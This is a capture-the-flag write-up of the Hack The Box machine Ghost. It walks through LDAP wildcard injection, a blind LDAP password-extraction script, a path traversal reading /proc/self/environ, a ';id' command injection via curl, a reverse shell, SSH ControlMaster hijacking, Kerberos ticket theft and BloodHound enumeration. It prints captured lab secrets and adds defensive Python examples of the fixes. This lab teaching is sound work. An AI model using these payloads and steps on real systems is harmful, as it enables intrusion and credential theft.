Hackthebox: Ghost

Foued SAIDI

Overview

Ghost is an insane-difficulty machine from Hack The Box. The chain runs: LDAP injection on the intranet login -> blind LDAP extraction of the Gitea password -> source code review in Gitea, revealing a path traversal (LFI) in the blog and a command injection gated by a secret header -> header recovered through the LFI, RCE in the intranet container -> Kerberos ticket theft over an SSH ControlMaster socket -> BloodHound information gathering -> ADIDNS record injection (DNS spoofing) to capture a user's NetNTLMv2 hash -> ReadGMSAPassword abuse -> Golden SAML attack -> ADFS web interface authentication bypass -> MSSQL command injection -> SeImpersonatePrivilege abuse using EfsPotato -> cross-domain trust abuse -> root flag.

Ghost-info-card

Reconnaissance

PORT     STATE SERVICE               VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-15 20:47:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ghost.htb, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Subject Alternative Name: DNS:DC01.ghost.htb, DNS:ghost.htb
| Not valid before: 2024-06-19T15:45:56
|_Not valid after: 2124-06-19T15:55:55
443/tcp open https?
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: ghost.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Subject Alternative Name: DNS:DC01.ghost.htb, DNS:ghost.htb
| Not valid before: 2024-06-19T15:45:56
|_Not valid after: 2124-06-19T15:55:55
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RC0+
|_ssl-date: 2024-07-15T20:51:35+00:00; +1m18s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-07-15T20:09:33
|_Not valid after: 2054-07-15T20:09:33
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ghost.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Subject Alternative Name: DNS:DC01.ghost.htb, DNS:ghost.htb
| Not valid before: 2024-06-19T15:45:56
|_Not valid after: 2124-06-19T15:55:55
3269/tcp open ssl/globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Subject Alternative Name: DNS:DC01.ghost.htb, DNS:ghost.htb
| Not valid before: 2024-06-19T15:45:56
|_Not valid after: 2124-06-19T15:55:55
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-07-15T20:51:32+00:00; +1m17s from scanner time.
| ssl-cert: Subject: commonName=DC01.ghost.htb
| Not valid before: 2024-06-16T15:49:55
|_Not valid after: 2024-12-16T15:49:55
8008/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-generator: Ghost 5.78
|_http-title: Ghost
8443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=core.ghost.htb
| Subject Alternative Name: DNS:core.ghost.htb
| Not valid before: 2024-06-18T15:14:02
|_Not valid after: 2124-05-25T15:14:02
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-title: Ghost Core
|_Requested resource was /login
Service Info: Host: DC01; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1m15s, deviation: 2s, median: 1m16s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-07-15T20:50:40
|_ start_date: N/A

The target is a Windows host acting as the ghost.htb domain controller: DNS on 53, Kerberos on 88, LDAP/LDAPS on 389/636 and the global catalog on 3268/3269, plus SMB with message signing required. The TLS certificates name it DC01.ghost.htb. Nmap also fingerprints nginx on Ubuntu on ports 8008 and 8443 (a Ghost CMS blog and a "Ghost Core" login page at core.ghost.htb), so there is a Linux host or container behind the same IP as well. Let's add ghost.htb, dc01.ghost.htb and core.ghost.htb to /etc/hosts.

Subdomain enumeration with ffuf

Fuzzing the Host header with ffuf (filtering out the default 7676-byte response) turns up an intranet vhost:

PS C:\Users\0xkujen\Desktop\Tools\ffuf_2.0.0_windows_amd64> .\ffuf.exe -w ..\SecLists-master\SecLists-master\Discovery\DNS\bitquark-subdomains-top100000.txt -H "Host: FUZZ.ghost.htb" -u "http://10.129.231.105:8008"  -fs 7676

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.0.0
________________________________________________

:: Method : GET
:: URL : http://10.129.231.105:8008
:: Wordlist : FUZZ: C:\Users\0xkujen\Desktop\Tools\SecLists-master\SecLists-master\Discovery\DNS\bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.ghost.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 7676
________________________________________________

[Status: 307, Size: 3968, Words: 52, Lines: 1, Duration: 3058ms]: [0:00:06] :: Errors: 0 ::
* FUZZ: intranet

Let’s add that to our /etc/hosts file.

Web Application - http://intranet.ghost.htb:8008/

Web Application

We are prompted with a login form. The field names in the request below, 1_ldap-username and 1_ldap-secret, tell us the credentials are checked against LDAP, and the domain controller lives on the same IP. If the application builds a search filter from the raw input (something like (&(sAMAccountName=<user>)(<attr>=<secret>))) and treats "the search returned an entry" as a successful login, the LDAP wildcard * in both fields will match every entry. That is the first thing to try. Let's fire up Burp Suite and do it.
This is the actual login request:

POST /login HTTP/1.1
Host: intranet.ghost.htb:8008
Content-Length: 833
Next-Action: c471eb076ccac91d6f828b671795550fd5925940
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/x-component
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEDsVbrSRRZCpBB25
Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22login%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%5D%7D%5D%7D%2Cnull%2Cnull%2Ctrue%5D
Sec-GPC: 1
Accept-Language: en-US,en;q=0.6
Origin: http://intranet.ghost.htb:8008
Referer: http://intranet.ghost.htb:8008/login
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_$ACTION_REF_1"


------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_$ACTION_1:0"

{"id":"c471eb076ccac91d6f828b671795550fd5925940","bound":"$@1"}
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_$ACTION_1:1"

[{}]
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_$ACTION_KEY"

k2982904007
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_ldap-username"

kujen
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_ldap-secret"

kujen
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="0"

[{},"$K1"]
------WebKitFormBoundaryEDsVbrSRRZCpBB25--

And this is the one with our injection:

POST /login HTTP/1.1
Host: intranet.ghost.htb:8008
Content-Length: 833
Next-Action: c471eb076ccac91d6f828b671795550fd5925940
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Accept: text/x-component
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEDsVbrSRRZCpBB25
Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22login%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%5D%7D%5D%7D%2Cnull%2Cnull%2Ctrue%5D
Sec-GPC: 1
Accept-Language: en-US,en;q=0.6
Origin: http://intranet.ghost.htb:8008
Referer: http://intranet.ghost.htb:8008/login
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_$ACTION_REF_1"


------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_$ACTION_1:0"

{"id":"c471eb076ccac91d6f828b671795550fd5925940","bound":"$@1"}
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_$ACTION_1:1"

[{}]
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_$ACTION_KEY"

k2982904007
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_ldap-username"

*
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="1_ldap-secret"

*
------WebKitFormBoundaryEDsVbrSRRZCpBB25
Content-Disposition: form-data; name="0"

[{},"$K1"]
------WebKitFormBoundaryEDsVbrSRRZCpBB25--

And we are in!!

Web Application

We can see this from the new page:

We are currently migrating Gitea to Bitbucket.
Domain logins to Gitea have been disabled.
You can only login with the gitea_temp_principal account and its corresponding intranet token as password.

So there is also a Gitea instance, with a gitea_temp_principal account whose password is its "intranet token". Let's add gitea.ghost.htb to /etc/hosts and take a look.

Web Application - http://gitea.ghost.htb:8008

Gitea Web Application

We have a username, but no password.

The intranet notice also said: For sysadmins: Look in LDAP for the attribute. You can also test the credentials by logging in to intranet. So the token is stored as an LDAP attribute, and the intranet login compares our input against it inside the same injectable filter. The LDAP wildcard is a substring match, so a secret of s* only logs in if the token starts with s. By submitting <known prefix><candidate character>* for every candidate and watching for the 303 redirect a successful login returns, we can recover the gitea_temp_principal password one character at a time (blind LDAP injection). One caveat: if the token contained a character outside the alphabet we try, the loop below would stop at the longest prefix it could confirm.

import string
import requests

# Login endpoint of the Next.js intranet. The Next-Action header identifies the
# server action that handles the login form (taken from the Burp request above).
url = 'http://intranet.ghost.htb:8008/login'

headers = {
    'Host': 'intranet.ghost.htb:8008',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Next-Action': 'c471eb076ccac91d6f828b671795550fd5925940',
    'Connection': 'keep-alive'
}

# Characters to try at each position (the token turned out to be lowercase + digits).
alphabet = string.ascii_lowercase + string.digits
passwd = ""

while True:
    for c in alphabet:
        # '<known prefix><candidate>*': the trailing LDAP wildcard makes the filter
        # match as soon as the prefix is right, so each request leaks one character.
        params = {
            '1_ldap-username': (None, 'gitea_temp_principal'),
            '1_ldap-secret': (None, f'{passwd}{c}*'),
            '0': (None, '[{},"$K1"]')
        }

        # files= sends multipart/form-data, matching what the browser posts.
        # allow_redirects=False keeps the 303 visible instead of following it.
        res = requests.post(url, headers=headers, files=params, allow_redirects=False)

        # A successful login answers with a 303 redirect; anything else means the
        # candidate was wrong, so move on to the next character.
        if res.status_code == 303:
            passwd += c
            print(f"Passwd: {passwd}")
            break
    else:
        # No character extended the prefix: the whole token has been recovered
        # (or the next character is outside our alphabet).
        break

print(passwd)

And we actually got it:

PS C:\Users\0xkujen> python3 .\gitea_bruteforce.py
Passwd: s
Passwd: sz
Passwd: szr
Passwd: szrr
Passwd: szrr8
Passwd: szrr8k
Passwd: szrr8kp
Passwd: szrr8kpc
Passwd: szrr8kpc3
Passwd: szrr8kpc3z
Passwd: szrr8kpc3z6
Passwd: szrr8kpc3z6o
Passwd: szrr8kpc3z6on
Passwd: szrr8kpc3z6onl
Passwd: szrr8kpc3z6onlq
Passwd: szrr8kpc3z6onlqf

gitea_temp_principal:szrr8kpc3z6onlqf
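
Why both tricks work, and how the intranet should have built its filter, as an added example that is not part of the original writeup or of the intranet's code. It models the login in Python: a constructed two-entry directory (the attribute name intranetToken and the second account's value are assumptions; the page never shows the schema), an unsafe filter builder next to one that escapes per RFC 4515, a small evaluator with LDAP wildcard semantics, and the same prefix-plus-wildcard extraction loop the script above runs against the real host.

```python
import re

# Constructed stand-in for the directory the intranet binds to. The account name comes
# from the intranet notice and the token is the value recovered above; the attribute
# name 'intranetToken' and the second entry are assumptions for the demo.
DIRECTORY = [
    {"sAMAccountName": "gitea_temp_principal", "intranetToken": "szrr8kpc3z6onlqf"},
    {"sAMAccountName": "florence.ramirez", "intranetToken": "constructed-other-value"},
]


def rfc4515_escape(value: str) -> str:
    """Escape a user-supplied assertion value for an LDAP search filter (RFC 4515):
    '*', '(', ')', '\\' and NUL become backslash-hex, so '*' stops being a wildcard."""
    return "".join(f"\\{ord(c):02x}" if c in "*()\\\x00" else c for c in value)


def build_filter_unsafe(username: str, secret: str) -> str:
    """The pattern the wildcard bypass relies on: raw input spliced into the filter."""
    return f"(&(sAMAccountName={username})(intranetToken={secret}))"


def build_filter_safe(username: str, secret: str) -> str:
    """Same filter, but every user-controlled value is escaped first."""
    return (f"(&(sAMAccountName={rfc4515_escape(username)})"
            f"(intranetToken={rfc4515_escape(secret)}))")


def _assertion_regex(assertion: str) -> "re.Pattern[str]":
    """LDAP substring semantics: an unescaped '*' matches anything, '\\XX' is a literal
    byte. Directory string matching is case-insensitive, so the regex is too."""
    out, i = "", 0
    while i < len(assertion):
        ch = assertion[i]
        if ch == "\\" and i + 2 < len(assertion):
            try:
                out += re.escape(chr(int(assertion[i + 1:i + 3], 16)))
                i += 3
                continue
            except ValueError:
                pass  # not a hex escape; fall through and treat '\' literally
        out += ".*" if ch == "*" else re.escape(ch)
        i += 1
    return re.compile(out, re.IGNORECASE | re.DOTALL)


def entry_matches(filter_str: str, entry: dict) -> bool:
    """Evaluate the one filter shape the builders emit: (&(attr=val)(attr=val))."""
    m = re.fullmatch(r"\(&\(([^=()]+)=(.*?)\)\(([^=()]+)=(.*?)\)\)", filter_str, re.DOTALL)
    if not m:
        raise ValueError(f"unsupported filter: {filter_str!r}")
    a1, v1, a2, v2 = m.groups()
    return (_assertion_regex(v1).fullmatch(entry.get(a1, "")) is not None
            and _assertion_regex(v2).fullmatch(entry.get(a2, "")) is not None)


def login(username: str, secret: str, build=build_filter_unsafe):
    """Models the intranet's flaw: 'the search returned an entry' is treated as
    'the credentials are valid'. Returns the matched account name, or None."""
    filt = build(username, secret)
    for entry in DIRECTORY:
        if entry_matches(filt, entry):
            return entry["sAMAccountName"]
    return None


def extract_secret_blind(username: str,
                         alphabet: str = "abcdefghijklmnopqrstuvwxyz0123456789",
                         build=build_filter_unsafe) -> str:
    """What the script above does against the real host: grow a prefix one character at
    a time with '<prefix><c>*' and the login oracle. Stops when no character extends the
    prefix, which also happens (too early) if the secret has a char outside `alphabet`."""
    known = ""
    while True:
        for c in alphabet:
            if login(username, known + c + "*", build) is not None:
                known += c
                break
        else:
            return known
```

With the unsafe builder, login('*', '*') returns the first account and extract_secret_blind recovers the whole token in at most 36 requests per character; with rfc4515_escape in place the wildcard becomes the literal \2a and both fail. Escaping closes the injection, but the better design never puts the secret in a search filter at all: look the user up, then bind (or compare server-side) with the password, which also removes the per-character oracle.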

Let’s login to gitea now:

Gitea Web Application

Two repositories are visible: blog and intranet.

Gitea Blog project - Local File Inclusion

Looking closely at the blog js code, we find this interesting snippet:

Local File Inclusion

The extra parameter is appended to a file path and the file is read back with no check that the result stays inside the content directory, so ../ sequences give us a path traversal / local file inclusion.
Let's leave this for later.
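
What that bug looks like next to its fix, as an added example in Python (the blog's own code is JavaScript and is not reproduced here; the directory layout is constructed in a temp dir and stands in for the real content root). The unsafe reader joins extra onto the root exactly as the snippet does; the safe one canonicalises the result and refuses anything that leaves the root, which also covers absolute paths and symlinks.

```python
import os
import tempfile


def setup_demo_tree() -> str:
    """Constructed stand-in for the blog's content directory (not the real layout on
    ghost.htb): <tmp>/content/posts/welcome.json is a legitimate target for `extra`;
    <tmp>/secret.env sits one level above the content root and must stay unreachable."""
    root = tempfile.mkdtemp(prefix="ghost-lfi-")
    content = os.path.join(root, "content")
    os.makedirs(os.path.join(content, "posts"))
    with open(os.path.join(content, "posts", "welcome.json"), "w") as f:
        f.write('{"title": "welcome"}')
    with open(os.path.join(root, "secret.env"), "w") as f:
        f.write("DEV_INTRANET_KEY=constructed-value-not-the-real-key\n")
    return content


def read_extra_unsafe(content_root: str, extra: str) -> str:
    """The bug as described above: `extra` is joined onto the content directory and
    opened as-is. '../' walks out of the root, and an absolute `extra` replaces the
    root entirely (os.path.join drops everything before an absolute component)."""
    with open(os.path.join(content_root, extra)) as f:
        return f.read()


def is_within_root(content_root: str, extra: str) -> bool:
    """Canonicalise both sides (realpath collapses '..' and follows symlinks) and
    require the root to be the common prefix. Comparing canonical paths rather than
    the raw string defeats '..', absolute paths and symlinks planted inside the root."""
    root = os.path.realpath(content_root)
    target = os.path.realpath(os.path.join(root, extra))
    return os.path.commonpath([root, target]) == root


def read_extra_safe(content_root: str, extra: str) -> str:
    """Hardened read: refuse anything that does not resolve under the content root."""
    if not is_within_root(content_root, extra):
        raise PermissionError(f"extra escapes the content root: {extra!r}")
    with open(os.path.realpath(os.path.join(content_root, extra))) as f:
        return f.read()
```

The check has to run on the resolved path, not on the string: rejecting the substring ".." would still let /proc/self/environ through as an absolute path, and would miss a symlink inside the root pointing outside it.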

Gitea Intranet Project - X-DEV-INTRANET-KEY

Looking at http://gitea.ghost.htb:8008/ghost-dev/intranet/src/branch/main/backend/src/api/dev/scan.rs , we can directly see a red flag:

Gitea Intranet Project

The url value is interpolated straight into a shell command string without sanitization, which is a command injection and therefore RCE (Remote Code Execution).
The imports include use crate::api::dev::DevGuard;, and dev.rs shows that this guard requires an X-DEV-INTRANET-KEY header on the request:

Gitea Intranet Project

The guard compares the header against a value taken from the environment variables, so the key is only as secret as the process environment, and /proc/self/environ is exactly what the LFI can read ;)

Chaining Local File Inclusion to get RCE

Now let's use the LFI: the extra parameter of the blog's content API walks up to /proc/self/environ:
http://ghost.htb:8008/ghost/api/content/posts/?key=37395e9e872be56438c83aaca6&extra=../../../../proc/self/environ

The response contains the process environment, including the header key: DEV_INTRANET_KEY=!@yqr!X2kxmQ.@Xe

Now let’s test our RCE:

kujen@kujen:~$ curl -X POST http://intranet.ghost.htb:8008/api-dev/scan -H 'X-DEV-INTRANET-KEY: !@yqr!X2kxmQ.@Xe' -H 'Content-Type: application/json' -d '{"url":";id"}'
{"is_safe":true,"temp_command_success":true,"temp_command_stdout":"uid=0(root) gid=0(root) groups=0(root)\n","temp_command_stderr":"bash: line 1: intranet_url_check: command not found\n"}kujen@kujen:~$

And we got it! The ; terminates the intended command and id runs as root inside the application container (the stderr even shows the intranet_url_check binary is not present, and the endpoint still reports is_safe: true).
Let's use the same injection point for a reverse shell:

PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.231.105] 49848
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
36b733906694

And we are in!!
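
Before moving on, the scan.rs bug and its fix, modelled in Python as an added example (this is not the intranet's Rust code, which the page only shows as a screenshot). printf stands in for the intranet_url_check binary we do not have; the bug does not depend on which program is run. The unsafe function splices the URL into one shell string exactly as the endpoint does, so the ;id payload from the curl above works against it; the quoted and shell-free variants do not, and an allowlist validator rejects the payload before anything runs.

```python
import shlex
import subprocess
from urllib.parse import urlsplit


def run_check_unsafe(url: str) -> str:
    """Models the pattern flagged in scan.rs: the URL is spliced into one shell string,
    so ';', '|', '$(...)' and backticks inside `url` are interpreted by /bin/sh."""
    cmd = f"printf '%s\\n' {url}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_check_quoted(url: str) -> str:
    """If a shell really cannot be avoided, shlex.quote turns the URL into one word."""
    cmd = f"printf '%s\\n' {shlex.quote(url)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_check_safe(url: str) -> str:
    """Preferred fix: no shell at all. argv is a list, so the URL is exactly one
    argument to the program whatever characters it contains."""
    return subprocess.run(["printf", "%s\n", url], capture_output=True, text=True).stdout


def validate_url(url: str) -> str:
    """Defence in depth for an endpoint that is supposed to receive a URL: only http(s),
    and a hostname made of letters, digits, '.' and '-'. Reject before anything runs."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if parts.scheme not in ("http", "https") or not host:
        raise ValueError(f"rejected url: {url!r}")
    if not all(ch.isalnum() or ch in ".-" for ch in host):
        raise ValueError(f"rejected host: {host!r}")
    return url


if __name__ == "__main__":
    payload = ";echo INJECTED"          # same shape as the ';id' used above
    print(repr(run_check_unsafe(payload)))   # second line of output is INJECTED
    print(repr(run_check_safe(payload)))     # the payload is printed back literally
```

The argv form is the real fix; quoting is a fallback for code that must build a command line, and validation is a second layer, not a substitute (it cannot know what every downstream program treats as special). The X-DEV-INTRANET-KEY guard was never a mitigation for this bug: it only moved the problem to keeping one environment variable secret.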

Lateral Movement - florence.ramirez

First, let's look at the container's environment variables for anything interesting:

# env
DATABASE_URL=./database.sqlite
ROCKET_ADDRESS=0.0.0.0
HOSTNAME=36b733906694
SHLVL=1
HOME=/root
OLDPWD=/app
LDAP_HOST=ldap://windows-host:389
DEV_INTRANET_KEY=!@yqr!X2kxmQ.@Xe
_=klist
RUSTUP_HOME=/usr/local/rustup
LDAP_BIND_DN=CN=Intranet Principal,CN=Users,DC=ghost,DC=htb
PATH=/usr/local/cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
JWT_SECRET=*xopkAGbLyg9bK_A
RUST_VERSION=1.79.0
PWD=/
LDAP_BIND_PASSWORD=He!KA9oKVT3rL99j
CARGO_HOME=/usr/local/cargo

The docker-entrypoint.sh script in / is also worth a look:

# cat docker-entrypoint.sh
#!/bin/bash

mkdir /root/.ssh
mkdir /root/.ssh/controlmaster
printf 'Host *\n ControlMaster auto\n ControlPath ~/.ssh/controlmaster/%%r@%%h:%%p\n ControlPersist yes' > /root/.ssh/config

exec /app/ghost_intranet

The config it writes turns on SSH connection multiplexing (ControlMaster) for every host, with the control sockets under /root/.ssh/controlmaster. Let's see what is in there:

# find / -name *controlmaster* 2> /dev/null
/root/.ssh/controlmaster
# ls /root/.ssh/controlmaster
florence.ramirez@ghost.htb@dev-workstation:22
# cd /root/.ssh/controlmaster
# ls
florence.ramirez@ghost.htb@dev-workstation:22
# file florence.ramirez@ghost.htb@dev-workstation:22
florence.ramirez@ghost.htb@dev-workstation:22: socket

There is a control socket named florence.ramirez@ghost.htb@dev-workstation:22. With ControlMaster auto and ControlPersist yes, an SSH client in this container has at some point opened a session as florence.ramirez to dev-workstation and left the master connection alive in the background; any new ssh to the same user@host:port will be multiplexed over that connection without authenticating again. Running the entrypoint once more only reproduces the config write (the application itself fails to start because the port is already bound):

# bash docker-entrypoint.sh
mkdir: cannot create directory '/root/.ssh': File exists
mkdir: cannot create directory '/root/.ssh/controlmaster': File exists
Error: Rocket failed to bind network socket to given address/port.
thread 'main' panicked at /usr/local/cargo/registry/src/index.crates.io-6f17d22bba15001f/rocket-0.5.1/src/error.rs:279:9:
aborting due to socket bind error
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
# env
DATABASE_URL=./database.sqlite
ROCKET_ADDRESS=0.0.0.0
HOSTNAME=36b733906694
SHLVL=1
HOME=/root
OLDPWD=/app
LDAP_HOST=ldap://windows-host:389
DEV_INTRANET_KEY=!@yqr!X2kxmQ.@Xe
_=docker-entrypoint.sh
RUSTUP_HOME=/usr/local/rustup
LDAP_BIND_DN=CN=Intranet Principal,CN=Users,DC=ghost,DC=htb
PATH=/usr/local/cargo/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
JWT_SECRET=*xopkAGbLyg9bK_A
RUST_VERSION=1.79.0
PWD=/
LDAP_BIND_PASSWORD=He!KA9oKVT3rL99j
CARGO_HOME=/usr/local/cargo
#

The environment is the same as before. LDAP_BIND_DN / LDAP_BIND_PASSWORD (the Intranet Principal account) and JWT_SECRET are worth noting down, but the bind account is not what gets us further here.
What does is the control socket: ssh to florence.ramirez@ghost.htb@dev-workstation reuses the existing master connection, and on that workstation the user's Kerberos credential cache should be lying around:

# ssh florence.ramirez@ghost.htb@dev-workstation
Pseudo-terminal will not be allocated because stdin is not a terminal.
id
uid=50(florence.ramirez) gid=50(staff) groups=50(staff),51(it)
python3 -c 'import pty;pty.spawn("/bin/bash")'
florence.ramirez@LINUX-DEV-WS01:~$ ls
ls
florence.ramirez@LINUX-DEV-WS01:~$ klist
klist
Ticket cache: FILE:/tmp/krb5cc_50
Default principal: florence.ramirez@GHOST.HTB

Valid starting Expires Service principal
04/03/25 18:33:01 04/04/25 04:33:01 krbtgt/GHOST.HTB@GHOST.HTB
renew until 04/04/25 18:33:01
florence.ramirez@LINUX-DEV-WS01:~$ ls /tmp
ls /tmp
init_success nmbd-stdout---supervisor-j48_1igi.log
krb5cc_50 winbind-stdout---supervisor-o_401b29.log

And yes! The user's TGT sits in the credential cache /tmp/krb5cc_50 (a Kerberos ccache file, despite the .kirbi name we give the copy below). Let's base64 it, paste it onto the attacker machine and point KRB5CCNAME at it:

florence.ramirez@LINUX-DEV-WS01:~$ cat /tmp/krb5cc_50 | base64
cat /tmp/krb5cc_50 | base64
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

And now let's authenticate ourselves with it:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ echo 'BQQADAABAAgAAAAAAAAAAAAAAAEAAAABAAAACUdIT1NULkhUQgAAABBmbG9yZW5jZS5yYW1pcmV6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' | base64 -d > ticket.florence.ramirez.kirbi

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ export KRB5CCNAME=ticket.florence.ramirez.kirbi

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ klist
Ticket cache: FILE:ticket.florence.ramirez.kirbi
Default principal: florence.ramirez@GHOST.HTB

Valid starting Expires Service principal
04/03/2025 18:38:02 04/04/2025 04:38:02 krbtgt/GHOST.HTB@GHOST.HTB
renew until 04/04/2025 18:38:02

netexec confirms the ticket is accepted (--use-kcache authenticates with the ccache in KRB5CCNAME):

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ nxc smb ghost.htb -u florence.ramirez --use-kcache
SMB 10.129.231.105 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:ghost.htb) (signing:True) (SMBv1:False)
SMB 10.129.231.105 445 DC01 [+] ghost.htb\florence.ramirez from ccache

Information gathering with BloodHound - DNS Spoofing

Now that we authenticate as florence.ramirez, let's collect the domain with bloodhound-python:

┌──(kali㉿kali)-[~/Hackthebox/GHost]
└─$ bloodhound-python -u 'florence.ramirez' -k -ns 10.129.231.105 -d ghost.htb -c all --zip --use-ldap
/usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-'
xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>')
Password:
INFO: Found AD domain: ghost.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: dc01.ghost.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
Traceback (most recent call last):
File "/usr/bin/bloodhound-python", line 33, in <module>
sys.exit(load_entry_point('bloodhound==1.7.2', 'console_scripts', 'bloodhound-python')())
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/bloodhound/__init__.py", line 343, in main
bloodhound.run(collect=collect,
File "/usr/lib/python3/dist-packages/bloodhound/__init__.py", line 78, in run
self.pdc.prefetch_info('objectprops' in collect, 'acl' in collect, cache_computers=do_computer_enum)
File "/usr/lib/python3/dist-packages/bloodhound/ad/domain.py", line 571, in prefetch_info
self.get_objecttype()
File "/usr/lib/python3/dist-packages/bloodhound/ad/domain.py", line 260, in get_objecttype
self.ldap_connect()
File "/usr/lib/python3/dist-packages/bloodhound/ad/domain.py", line 71, in ldap_connect
ldap = self.ad.auth.getLDAPConnection(hostname=self.hostname, ip=ip,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/bloodhound/ad/authentication.py", line 115, in getLDAPConnection
bound = conn.bind()
^^^^^^^^^^^
File "/home/kali/.local/lib/python3.12/site-packages/ldap3/core/connection.py", line 599, in bind
self.open(read_server_info=False)
File "/home/kali/.local/lib/python3.12/site-packages/ldap3/strategy/sync.py", line 57, in open
BaseStrategy.open(self, reset_usage, read_server_info)
File "/home/kali/.local/lib/python3.12/site-packages/ldap3/strategy/base.py", line 154, in open
raise LDAPSocketOpenError('invalid server address')
ldap3.core.exceptions.LDAPSocketOpenError: invalid server address

This error kept coming back: bloodhound-python could not turn the DC name into an address with the nameserver given by -ns, so the LDAP connection never opened. Running a local dnschef that answers every A query with the target IP, and pointing -ns at it, fixed it: the SRV lookups for the _msdcs records are simply proxied upstream, while the A lookups for dc01.ghost.htb are "cooked" to 10.129.231.105.
